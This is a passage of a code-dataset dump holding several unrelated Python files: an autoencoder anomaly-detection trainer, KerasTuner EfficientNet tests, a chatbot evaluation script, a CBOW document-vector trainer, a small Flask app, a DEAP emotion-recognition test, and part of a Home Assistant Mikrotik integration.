and master_details['positions'][key] < 0 ):\n child['binary_indicator'][key] = [0,1]\n if((child['positions'][key]) < 0 and master_details['positions'][key] > 0 ):\n child['binary_indicator'][key] = [1,0]\n if((child['positions'][key]) < 0 and master_details['positions'][key] < 0 ):\n child['binary_indicator'][key] = [1,1] \n\nfor child in child_details:\n print(json.dumps(child['binary_indicator']))\n print(json.dumps(child['positions']))\n\nprint(json.dumps(master_details['positions']))","sub_path":"tests/working_code.py","file_name":"working_code.py","file_ext":"py","file_size_in_byte":22550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"223190320","text":"import logging\r\n\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\n# import wandb\r\nimport os\r\nimport joblib\r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom FedML.fedml_core.trainer.model_trainer import ModelTrainer\r\n\r\n\r\nclass AETrainer(ModelTrainer):\r\n def get_model_params(self):\r\n return self.model.cpu().state_dict()\r\n\r\n def set_model_params(self, model_parameters):\r\n self.model.load_state_dict(model_parameters)\r\n\r\n def train(self, train_data, device, args):\r\n logging.info(device)\r\n model = self.model.to(device)\r\n model.train()\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\r\n loss_func = torch.nn.MSELoss()\r\n # model training\r\n for epoch in range(args.epochs):\r\n\r\n # mini- batch loop\r\n epoch_loss = 0.0\r\n for idx, inp in enumerate(train_data):\r\n # if idx < round(len(train_data) * 2 / 3):\r\n inp = inp.to(device)\r\n optimizer.zero_grad()\r\n decode = model(inp)\r\n loss = loss_func(decode, inp)\r\n # epoch_loss += loss.item() / args.batch_size\r\n loss.backward()\r\n optimizer.step()\r\n # logging.info('Epoch training complete')\r\n\r\n def test(self, test_data, device, args):\r\n pass\r\n\r\n def test_local(self, client_index, threshold, train_data, test_data, device, args):\r\n # pass\r\n model = self.model.to(device)\r\n self.model.eval()\r\n\r\n true_negative = []\r\n false_positive = []\r\n true_positive = []\r\n false_negative = []\r\n thres_func = nn.MSELoss()\r\n\r\n for idx, inp in enumerate(train_data):\r\n if idx >= round(len(train_data) * 2 / 3):\r\n inp = inp.to(device)\r\n diff = thres_func(model(inp), inp)\r\n mse = diff.item()\r\n if mse > threshold:\r\n false_positive.append(idx)\r\n else:\r\n true_negative.append(idx)\r\n\r\n for idx, inp in enumerate(test_data):\r\n inp = inp.to(device)\r\n diff = thres_func(model(inp), inp)\r\n mse = diff.item()\r\n if mse > threshold:\r\n true_positive.append(idx)\r\n else:\r\n false_negative.append(idx)\r\n\r\n # print(len(true_positive))\r\n # print(len(false_positive))\r\n\r\n accuracy = (len(true_positive) + len(true_negative)) \\\r\n / (len(true_positive) + len(true_negative) + len(false_positive) + len(false_negative))\r\n precision = len(true_positive) / (len(true_positive) + len(false_positive))\r\n false_positive_rate = len(false_positive) / (len(false_positive) + len(true_negative))\r\n\r\n logging.info('client_index = %d, The threshold is %f' % (client_index, threshold))\r\n logging.info('client_index = %d, The True negative number is %f' % (client_index, len(true_negative)))\r\n logging.info('client_index = %d, The False positive number is %f' % (client_index, len(false_positive)))\r\n logging.info('client_index = %d, The True positive number is %f' % (client_index, len(true_positive)))\r\n logging.info('client_index = %d, The False negative number is %f' % (client_index, len(false_negative)))\r\n logging.info('client_index = %d, The accuracy is %f' % (client_index, accuracy))\r\n logging.info('client_index = %d, The precision is %f' % (client_index, precision))\r\n logging.info('client_index = %d, The false positive rate is %f' % (client_index, false_positive_rate))\r\n\r\n return accuracy, precision, false_positive_rate\r\n\r\n def test_on_the_server(self, train_data_local_dict, test_data_local_dict, device, args=None):\r\n # logging.info(device)\r\n # mse_results_global = []\r\n # threshold_dict = {}\r\n # thres_func = nn.MSELoss()\r\n # #\r\n # # opt_threshold = [round(4955.0 * 0.67 / args.batch_size), round(1311.0 * 0.67 / args.batch_size),\r\n # # round(3910.0 * 0.67 / args.batch_size), round(17524.0 * 0.67 / args.batch_size),\r\n # # round(6215.0 * 0.67 / args.batch_size), round(9851.0 * 0.67 / args.batch_size),\r\n # # round(5215.0 * 0.67 / args.batch_size), round(4658.0 * 0.67 / args.batch_size),\r\n # # round(1953.0 * 0.67 / args.batch_size)]\r\n # #\r\n # # test_threshold = 1000\r\n #\r\n # for client_index in train_data_local_dict.keys():\r\n # opt_data = train_data_local_dict[client_index]\r\n # mse_results_per_client = []\r\n # self.model.eval()\r\n # for idx, inp in enumerate(opt_data):\r\n # if idx >= round(len(opt_data) * 2 / 3):\r\n # inp = inp.to(device)\r\n # decode = self.model(inp)\r\n # diff = thres_func(decode, inp)\r\n # mse = diff.item()\r\n # mse_results_per_client.append(mse)\r\n # mse_results_global.append(mse)\r\n # mse_results_per_client = torch.tensor(mse_results_per_client)\r\n # threshold_dict[client_index] = torch.mean(mse_results_per_client) + 1 * torch.std(mse_results_per_client) / np.sqrt(\r\n # args.batch_size)\r\n #\r\n # # threshold_path = os.path.join(\"/Users/ultraz/PycharmProjects/FedML-IoT-V/experiments/distributed\", 'threshold_dict.pkl')\r\n # # joblib.dump(threshold_dict, threshold_path)\r\n #\r\n #\r\n # mse_results_global = torch.tensor(mse_results_global)\r\n # threshold_global =torch.mean(mse_results_global) + 1 * torch.std(mse_results_global)/ np.sqrt(args.batch_size)\r\n # logging.info('The threshold is %f' % (threshold_global))\r\n #\r\n # accuracy_array_global = []\r\n # precision_array_global = []\r\n # fpr_array_global = []\r\n #\r\n # for client_index in test_data_local_dict.keys():\r\n # test_data = test_data_local_dict[client_index]\r\n # # using global threshold for test\r\n # # [accuracy_client, precision_client, fpr_client] = self.test_local(client_index,\r\n # # (test_threshold[client_index] / 2), threshold_global, test_data, device, args)\r\n # [accuracy_client, precision_client, fpr_client] = self.test_local(client_index, threshold_global, train_data_local_dict[client_index], test_data, device, args)\r\n # accuracy_array_global.append(accuracy_client)\r\n # precision_array_global.append(precision_client)\r\n # fpr_array_global.append(fpr_client)\r\n\r\n model_save_dir = \"../../training\"\r\n path = os.path.join(model_save_dir, 'model.ckpt')\r\n torch.save(self.model.state_dict(), path)\r\n\r\n return True","sub_path":"training/ae_trainer.py","file_name":"ae_trainer.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"252704653","text":"# Copyright 2019 The KerasTuner Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for HyperEfficientNet Model.\"\"\"\n\nimport numpy as np\nimport pytest\nimport tensorflow as tf\nfrom packaging.version import parse\n\nfrom keras_tuner.applications import efficientnet\nfrom keras_tuner.engine import hypermodel as hm_module\nfrom keras_tuner.engine import hyperparameters as hp_module\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\n@pytest.mark.parametrize(\"version\", [\"B0\", \"B1\"])\ndef test_model_construction(version):\n hp = hp_module.HyperParameters()\n hp.Choice(\"version\", [version])\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(32, 32, 3), classes=10\n )\n model = hypermodel.build(hp)\n assert hp.values[\"version\"] == version\n assert model.layers\n assert model.name == \"EfficientNet\"\n assert model.output_shape == (None, 10)\n model.train_on_batch(np.ones((1, 32, 32, 3)), np.ones((1, 10)))\n out = model.predict(np.ones((1, 32, 32, 3)))\n assert out.shape == (1, 10)\n\n\ndef test_tf_version_too_low_error():\n pp_module = efficientnet.preprocessing\n efficientnet.preprocessing = None\n\n with pytest.raises(ImportError, match=\"HyperEfficientNet requires\"):\n efficientnet.HyperEfficientNet()\n\n efficientnet.preprocessing = pp_module\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_hyperparameter_existence_and_defaults():\n hp = hp_module.HyperParameters()\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(224, 224, 3), classes=10\n )\n hypermodel.build(hp)\n assert hp.get(\"version\") == \"B0\"\n assert hp.get(\"top_dropout_rate\") == 0.2\n assert hp.get(\"learning_rate\") == 0.01\n assert hp.get(\"pooling\") == \"avg\"\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_hyperparameter_override():\n hp = hp_module.HyperParameters()\n hp.Choice(\"version\", [\"B1\"])\n hp.Fixed(\"top_dropout_rate\", 0.5)\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(256, 256, 3), classes=10\n )\n hypermodel.build(hp)\n assert hp.get(\"version\") == \"B1\"\n assert hp.get(\"top_dropout_rate\") == 0.5\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_input_tensor():\n hp = hp_module.HyperParameters()\n inputs = tf.keras.Input(shape=(256, 256, 3))\n hypermodel = efficientnet.HyperEfficientNet(input_tensor=inputs, classes=10)\n model = hypermodel.build(hp)\n assert model.inputs == [inputs]\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_override_compiling_phase():\n class MyHyperEfficientNet(efficientnet.HyperEfficientNet):\n def _compile(self, model, hp):\n learning_rate = 0.1\n optimizer_name = hp.Choice(\n \"optimizer\", [\"adam\", \"sgd\"], default=\"adam\"\n )\n if optimizer_name == \"sgd\":\n optimizer = tf.keras.optimizers.SGD(\n momentum=0.1, learning_rate=learning_rate\n )\n elif optimizer_name == \"adam\":\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=learning_rate\n )\n model.compile(\n optimizer=optimizer,\n loss=\"categorical_crossentropy\",\n metrics=[\"accuracy\"],\n )\n\n hp = hp_module.HyperParameters()\n hypermodel = MyHyperEfficientNet(input_shape=(32, 32, 3), classes=5)\n hypermodel.build(hp)\n assert \"learning_rate\" not in hp.values\n assert hp.values[\"optimizer\"] == \"adam\"\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_augmentation_param_invalid_input():\n with pytest.raises(ValueError):\n efficientnet.HyperEfficientNet(\n input_shape=(32, 32, 3), classes=10, augmentation_model=0\n )\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_augmentation_param_fixed_model():\n hp = hp_module.HyperParameters()\n aug_model = tf.keras.Sequential(name=\"aug\")\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(32, 32, 3), classes=10, augmentation_model=aug_model\n )\n model = hypermodel.build(hp)\n assert model.layers[1].name == \"aug\"\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_augmentation_param_hyper_model():\n class HyperAug(hm_module.HyperModel):\n def build(self, hp):\n model = tf.keras.Sequential(name=\"aug\")\n scaling_factor = hp.Choice(\"scaling_factor\", [1])\n model.add(tf.keras.layers.Lambda(lambda x: x * scaling_factor))\n return model\n\n hp = hp_module.HyperParameters()\n aug_hm = HyperAug()\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(32, 32, 3), classes=10, augmentation_model=aug_hm\n )\n model = hypermodel.build(hp)\n assert model.layers[1].name == \"aug\"\n assert hp.values[\"scaling_factor\"] == 1\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_pooling_is_max():\n hp = hp_module.HyperParameters()\n hp.values[\"pooling\"] = \"max\"\n hypermodel = efficientnet.HyperEfficientNet(\n input_shape=(32, 32, 3), classes=10\n )\n hypermodel.build(hp)\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_no_classes_raise_error():\n with pytest.raises(ValueError, match=\"classes\"):\n efficientnet.HyperEfficientNet(input_shape=(32, 32, 3))\n\n\n@pytest.mark.skipif(\n parse(tf.__version__) < parse(\"2.3.0\"),\n reason=\"Preprocessing layers and \"\n \"applications.efficientnet only exist in TF2.3+.\",\n)\ndef test_no_input_shape_tensor_raise_error():\n with pytest.raises(ValueError, match=\"input_tensor\"):\n efficientnet.HyperEfficientNet(classes=10)\n","sub_path":"keras_tuner/applications/efficientnet_test.py","file_name":"efficientnet_test.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"106486077","text":"from keras.models import load_model\nimport json\nimport nltk\nimport numpy as np\nimport pickle\nimport helpers\n\nmodel = load_model('chatbot_model.h5')\nnltk.download('punkt')\n\nintents = json.loads(open('intents.json').read())\nwords = pickle.load(open('words.pkl', 'rb'))\nclasses = pickle.load(open('classes.pkl', 'rb'))\n\n# return bag of words array: 0 or 1 for each word in the bag that exists in the sentence\n\ndef bag_of_words(sentence, words, show_details=True):\n # tokenize the pattern\n sentence_words = helpers.preprocess_text(sentence)\n # bag of words - matrix of N words, vocabulary matrix\n bag = [0]*len(words)\n for s in sentence_words:\n for i, w in enumerate(words):\n if w == s:\n # assign 1 if current word is in the vocabulary position\n bag[i] = 1\n if show_details:\n print(\"found in bag: %s\" % w)\n return(np.array(bag))\n\ndef predict_class(sentence, model):\n p = bag_of_words(sentence, words, show_details=False)\n predictions = model.predict(np.array([p]))[0]\n\n # filter out predictions below a threshold\n error_threshold = 0.15\n results = [[i, r] for i, r in enumerate(predictions) if r > error_threshold]\n\n # sort by strength of probability\n results.sort(key=lambda x: x[1], reverse=True)\n\n return list(map(lambda x: {\n \"intent\": classes[x[0]],\n \"probability\": str(x[1])\n }, results))\n\ndef chatbot_response(msg):\n predictions = predict_class(msg, model)\n post_ids = list(map(lambda prediction: prediction['intent'], predictions))\n return post_ids if len(predictions) > 0 else False\n\nif __name__ == \"__main__\":\n with open('../dataset.json', 'r') as dataset_file:\n dataset = json.load(dataset_file)\n\n successes = 0\n partial_success = 0\n matches = 0\n for (post_id, post) in dataset.items():\n test_title = post['Children'][0]['Title'] + ' ' + ' '.join(post['Children'][0]['Tags'] + post['Children'][0]['BodyTokens'])\n response = chatbot_response(test_title)\n if response is not False:\n matches += 1\n success = response[0] == post_id\n # print(f\"{response}, success: {response == row['Id']}\")\n\n if success:\n successes += 1\n elif post_id in response:\n partial_success += 1\n else:\n print(f\"{response}, {test_title}, success: {response == post_id}\")\n for child in dataset[post_id]['Children']:\n print(child['Title'], child['Tags'])\n print('-' * 10)\n for child in dataset[response[0]]['Children']:\n print(child['Title'], child['Tags'])\n print()\n\n else:\n print(f\"Failed to find response {post_id}: '{test_title}'\")\n print(helpers.preprocess_text(test_title))\n\n\n print(f\"{successes} successes\")\n print(f\"{successes / len(dataset)} success rate\")\n\n print(f\"{partial_success} partial successes\")\n print(f\"{partial_success / (matches - successes)} partial success rate\")\n\n print(f\"{matches} matches\")\n print(f\"{successes / matches} match success rate\")\n\n print(f\"{matches / len(dataset)} match rate\")","sub_path":"keras/check_model.py","file_name":"check_model.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"82613847","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue 3/17 17:07:40 2017\n\n@author: duocai\n\"\"\"\n\nimport numpy as np\nimport json\nimport math\nimport datetime\nimport random\nimport doc_manager as dm\n\n# super parameter\n# window size\nwindow = 5\n# 学习率\nstart_alpha = 0.03\n# 控制内积范围,超过范围的再加sigmoid很小,可以丢弃\nMAX_EXP = 10\n# 向量维度\nlayer_size = 100\n\n# internal parameter\ndoc_num = 0\nunit_num = 0\n# 单元向量表\nword_vec_table = {}\n# 文档向量表\ndoc_vec_table = {}\n# 参数表, 参数个数即内部节点个数为叶节点个数(unit_num)-1, 初始化为正态分布取值\npara_table = {}\n# 所有用户,相当于所有文章\ndocs = {}\n# 所有地点,相当于所有单词\nwords_tree = {}\n# the index of the doc in the doc_vec_table\ndoc_index = {}\n# the index of the word in the word_vec_table\nword_index = {}\n# 开始时间\nstart_time = datetime.datetime.now()\n# iteration time\ntrain_num = 0\n\n\ndef init_data(doc_path, words_path):\n if not(doc_path or words_path):\n print('please fill doc_path and words_path')\n exit()\n global docs\n global words_tree\n # default 'data/movielen/handled/doc.txt'\n docs = dm.read_handled_data(doc_path)\n # default 'data/movielen/handled/tree.txt'\n words_tree = dm.read_handled_data(words_path)\n\n\ndef init_basic_parameter(p_layer_size=layer_size, p_window_size=window,\n p_learn_alpha=start_alpha, p_MAX_EXP=MAX_EXP):\n global docs\n global words_tree\n if docs == {} or words_tree == {}:\n print('Err: please init data with doc_path and words_path first')\n exit()\n\n global layer_size\n global window\n global MAX_EXP\n global start_alpha\n layer_size = p_layer_size\n window = p_window_size\n MAX_EXP = p_MAX_EXP\n start_alpha = p_learn_alpha\n\n global unit_num\n global doc_num\n unit_num = len(words_tree)\n doc_num = len(docs)\n global para_table\n global doc_vec_table\n global word_vec_table\n # 单元向量表\n word_vec_table = np.random.uniform(0, 1, layer_size * unit_num).reshape(unit_num, layer_size)\n # 参数表, 参数个数即内部节点个数为叶节点个数(unit_num)-1, 初始化为正态分布取值\n para_table = np.random.normal(0.0, 1, layer_size * (unit_num - 1)).reshape(unit_num - 1, layer_size)\n # 文档向量表\n doc_vec_table = np.random.uniform(0, 1, layer_size * doc_num).reshape(doc_num, layer_size)\n\n # map from the key of words, docs to index of vector table\n index = 0\n for word in words_tree.keys():\n word_index[word] = index\n index += 1\n index = 0\n for doc in docs.keys():\n doc_index[doc] = index\n index += 1\n\n\ndef sigmoid(x):\n return 1 / (1 + math.exp(-x))\n\n\ndef normalize(vec):\n average, std = np.average(vec), np.std(vec)\n return (vec - average) / std\n\n\n# show message of the training process\ndef show_message():\n def by_similar(word_s):\n return word_s[1]\n # check for similar\n num = 0\n words = ['will', 'to', 'like', 'good', 'eight', 'or', 'dog', 'movie']\n for word in words:\n if word not in words_tree:\n continue\n vec = word_vec_table[word_index[word]]\n similar = []\n for other in words_tree.keys():\n other_vec = word_vec_table[word_index[other]]\n similar.append((other, np.dot(vec, other_vec)))\n similar_sorted = sorted(similar, key=by_similar, reverse=True)\n print(word, ':', list(map(lambda x: x[0], similar_sorted[0:10])))\n num += 1\n if num > 10:\n break\n\n\n# 训练doc_key指定的文章\ndef DV_Enhanced_CBOW(doc_key):\n\n sent = docs[doc_key][0].split('\\t') # 文章(多篇文章只取第一篇),用户访问地点序列\n sent_len = len(sent)\n\n # start train\n for pos in range(sent_len):\n neul = np.zeros(layer_size) # 隐藏层\n neule = np.zeros(layer_size) # 记录隐藏层累积变化量\n\n word = sent[pos] # 地点id string\n if word not in words_tree: # 不存在该词则忽略\n continue\n\n # 计算context向量和\n # 先加上本段文章向量,与pos无关\n neul += doc_vec_table[doc_index[doc_key]]\n num = random.randint(0, window) # 随机起点,并不是严格从0开始\n start = num\n while start < 2 * window + 1:\n cur_pos = pos - window + start\n # 左右几个词不包含当前词\n # or 现在位置超过范围,则跳过 , and ignore ''\n if start == window or cur_pos < 0 or cur_pos >= sent_len or sent[cur_pos] == '':\n start += 1\n continue\n # 计算context向量和\n neul += word_vec_table[word_index[sent[cur_pos]]]\n start += 1\n\n # 利用霍夫曼树计算\n word_in_tree = words_tree[word] # 当前地点\n points = word_in_tree['points']\n codes = word_in_tree['codes']\n codes_len = len(codes)\n for layer_index in range(codes_len):\n # 计算内积\n dot = np.dot(neul, para_table[points[layer_index]])\n # 内积不在范围内直接丢弃\n if dot > MAX_EXP or dot < -MAX_EXP:\n continue\n # simoid\n dot = sigmoid(dot)\n # 偏导数的公用部分*学习率alpha\n g = (1 - codes[layer_index] - dot) * start_alpha\n\n # 反向更新参数\n # 先更新隐藏层\n neule += g * para_table[points[layer_index]]\n # 后更新参数\n para_table[points[layer_index]] += g * neul\n # normalize\n para_table[points[layer_index]] = normalize(para_table[points[layer_index]])\n\n # 更新doc vector\n doc_vec_index = doc_index[doc_key]\n doc_vec_table[doc_vec_index] += neule\n # normalize\n doc_vec_table[doc_vec_index] = normalize(doc_vec_table[doc_vec_index])\n # 将更新传递到词向量\n start = num\n while start < 2 * window + 1:\n cur_pos = pos - window + start\n # 左右几个词不包含当前词\n # or 现在位置超过范围,则跳过 and ignore ''\n if start == window or cur_pos < 0 or cur_pos >= sent_len or sent[cur_pos] == '':\n start += 1\n continue\n # 更新词向量\n vec_index = word_index[sent[cur_pos]]\n word_vec_table[vec_index] += neule\n # 修正词向量,normalize\n word_vec_table[vec_index] = normalize(word_vec_table[vec_index])\n start += 1\n\n # 输出现在的时间\n global train_num\n train_num += 1\n if train_num % 500 == 0:\n print('Iteration: ', train_num, ',time: ', (datetime.datetime.now() - start_time).seconds, 's')\n show_message()\n\n\ndef ndarray_to_json(ndarr):\n ret = []\n for vec in ndarr:\n ret.append(list(map(lambda x: float(x), list(vec))))\n return json.dumps(ret)\n\n\n# test\nif __name__ == '__main__':\n init_data('data/movielen/handled/doc.txt', 'data/movielen/handled/tree.txt')\n init_basic_parameter(layer_size, window, start_alpha, MAX_EXP)\n for iter_num in range(40):\n for doc_key in docs.keys():\n DV_Enhanced_CBOW(doc_key)\n # output vec\n word = open('data/movielen/vector/word_vec.txt', 'w')\n doc = open('data/movielen/vector/doc_vec.txt', 'w')\n word.write(ndarray_to_json(word_vec_table))\n doc.write(ndarray_to_json(doc_vec_table))\n word.close()\n doc.close()\n","sub_path":"codes/PMDV/CBOW_DV.py","file_name":"CBOW_DV.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347038140","text":"from flask import Flask\napp = Flask(__name__)\napp.config['DEBUG'] = True\n\n# Note: We don't need to call run() since our application is embedded within\n# the App Engine WSGI application server.\n\n\nform=\"\"\"
\n\t\n \n\t
\n\"\"\"\n@app.route('/')\ndef hello():\n \"\"\"Return a friendly HTTP greeting.\"\"\"\n return form\n \n#@app.route('/testform')\n#def get(self):\n# q = self.request.get(\"q\")\n# return q\n\n@app.errorhandler(404)\ndef page_not_found(e):\n \"\"\"Return a custom 404 error.\"\"\"\n return 'Sorry, nothing at this URL.', 404\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"425300683","text":"# coding:utf-8\nimport time\nimport tensorflow as tf\nfrom input_data import readFile, data_reshape_test\nimport deap_forward\nimport deap_backward\nimport numpy as np\n\ntest_num_examples = 10 # 测试组数目\nTEST_INTERVAL_SECS = 5 # 寻找最新模型等待时间s\n\n\ndef test(signal_re, labels_re):\n\n # 创建一个默认图,在该图中执行以下操作(多数操作和train中一样)\n with tf.Graph().as_default() as g: \n x = tf.placeholder(tf.float32, [\n test_num_examples,\n deap_forward.IMAGE_SIZE_X,\n deap_forward.IMAGE_SIZE_Y,\n deap_forward.NUM_CHANNELS]) \n y_ = tf.placeholder(tf.float32, [None, deap_forward.OUTPUT_NODE]) # ??\n y = deap_forward.forward(x, False, None) # ??\n\n ema = tf.train.ExponentialMovingAverage(deap_backward.MOVING_AVERAGE_DECAY)\n ema_restore = ema.variables_to_restore()\n saver = tf.train.Saver(ema_restore)\n\n # correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1)) # 判断预测值和实际值是否相同\n # correct_prediction = (abs(y-y_) < 0.5) # 预测结果与真实结果相差是否小于0.5\n # accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) # 求平均值得到准确率\n\n while True:\n with tf.Session() as sess:\n ckpt = tf.train.get_checkpoint_state(deap_backward.MODEL_SAVE_PATH)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n\n # 根据读入的模型名字切分出该模型是属于迭代了多少次保存的\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1] \n reshaped_x = np.reshape(signal_re, (\n test_num_examples,\n deap_forward.IMAGE_SIZE_X,\n deap_forward.IMAGE_SIZE_Y,\n deap_forward.NUM_CHANNELS))\n # 计算出测试集上准确率\n pred_labels = sess.run(y, feed_dict={x: reshaped_x})\n y_ = labels_re\n pred_correct_V = 0\n pred_correct_A = 0\n pred_correct_D = 0\n pred_correct_L = 0\n for i in range(test_num_examples):\n print(\"-------------我是可爱的分割线-----------\") # 测试用\n for j in range(4):\n print(pred_labels[i][j]) # 测试用\n print(y_[i][j]) # 测试用\n print(\"-----------\")\n if pred_labels[i][j] >= 0.5:\n pred_labels[i][j] = 1\n else:\n pred_labels[i][j] = 0\n if pred_labels[i][j] == y_[i][j] and j == 0:\n pred_correct_V += 1\n if pred_labels[i][j] == y_[i][j] and j == 1:\n pred_correct_A += 1\n if pred_labels[i][j] == y_[i][j] and j == 2:\n pred_correct_D += 1\n if pred_labels[i][j] == y_[i][j] and j == 3:\n pred_correct_L += 1\n Recognition_rate_V = pred_correct_V/test_num_examples\n Recognition_rate_A = pred_correct_A / test_num_examples\n Recognition_rate_D = pred_correct_D / test_num_examples\n Recognition_rate_L = pred_correct_L / test_num_examples\n # pred_labels = np.asarray(reshaped_x)\n # print(pred_labels) # 测试用\n print(\"----------我是可爱的分割线----------\") # debug用\n # print(labels_re) # 测试用\n print(\"After {0} training step(s), test accuracy V = {1} ,test accuracy A = {2}, \"\n \"test accuracy D = {3} ,test accuracy L = {4}\".format(global_step, Recognition_rate_V,\n Recognition_rate_A,\n Recognition_rate_D,\n Recognition_rate_L))\n else:\n print('No checkpoint file found')\n return\n time.sleep(TEST_INTERVAL_SECS) # 每隔TEST_INTERVAL_SECS秒寻找一次是否有最新模型\n\n\ndef main():\n signal_data, signal_labels = readFile('F:/情感计算/数据集/DEAP/s02.mat')\n signal_re, labels_re = data_reshape_test(signal_data, signal_labels)\n test(signal_re, labels_re)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"CNN/CNN_DEAP_1.2/deap_test.py","file_name":"deap_test.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"105130223","text":"\"\"\"Mikrotik Router integration.\"\"\"\r\n\r\nimport logging\r\nfrom homeassistant.exceptions import ConfigEntryNotReady\r\nfrom homeassistant.const import (\r\n CONF_NAME,\r\n CONF_HOST,\r\n CONF_PORT,\r\n CONF_USERNAME,\r\n CONF_PASSWORD,\r\n CONF_SSL,\r\n)\r\n\r\nfrom .mikrotik_controller import MikrotikControllerData\r\n\r\nfrom .const import (\r\n DOMAIN,\r\n DATA_CLIENT,\r\n)\r\n\r\n_LOGGER = logging.getLogger(__name__)\r\n\r\n\r\n# ---------------------------\r\n# async_setup\r\n# ---------------------------\r\nasync def async_setup(hass, _config):\r\n \"\"\"Set up configured Mikrotik Controller.\"\"\"\r\n hass.data[DOMAIN] = {}\r\n hass.data[DOMAIN][DATA_CLIENT] = {}\r\n return True\r\n\r\n\r\n# ---------------------------\r\n# async_setup_entry\r\n# ---------------------------\r\nasync def async_setup_entry(hass, config_entry):\r\n \"\"\"Set up Mikrotik Router as config entry.\"\"\"\r\n name = config_entry.data[CONF_NAME]\r\n host = config_entry.data[CONF_HOST]\r\n port = config_entry.data[CONF_PORT]\r\n username = config_entry.data[CONF_USERNAME]\r\n password = config_entry.data[CONF_PASSWORD]\r\n use_ssl = config_entry.data[CONF_SSL]\r\n\r\n mikrotik_controller = MikrotikControllerData(hass, config_entry, name, host, port, username, password, use_ssl)\r\n await mikrotik_controller.hwinfo_update()\r\n await mikrotik_controller.async_update()\r\n\r\n if not mikrotik_controller.data:\r\n raise ConfigEntryNotReady()\r\n\r\n hass.data[DOMAIN][DATA_CLIENT][config_entry.entry_id] = mikrotik_controller\r\n\r\n hass.async_create_task(\r\n hass.config_entries.async_forward_entry_setup(config_entry, \"sensor\")\r\n )\r\n\r\n hass.async_create_task(\r\n hass.config_entries.async_forward_entry_setup(config_entry, \"binary_sensor\")\r\n )\r\n\r\n hass.async_create_task(\r\n hass.config_entries.async_forward_entry_setup(config_entry, \"device_tracker\")\r\n )\r\n\r\n hass.async_create_task(\r\n hass.config_entries.async_forward_entry_setup(config_entry, \"switch\")\r\n )\r\n\r\n device_registry = await hass.helpers.device_registry.async_get_registry()\r\n device_registry.async_get_or_create(\r\n config_entry_id=config_entry.entry_id,\r\n manufacturer=mikrotik_controller.data['resource']['platform'],\r\n model=mikrotik_controller.data['routerboard']['model'],\r\n name=mikrotik_controller.data['routerboard']['model'],\r\n sw_version=mikrotik_controller.data['resource']['version'],\r\n )\r\n\r\n return True\r\n\r\n\r\n# ---------------------------\r\n# async_unload_entry\r\n# ---------------------------\r\nasync def async_unload_entry(hass, config_entry):\r\n 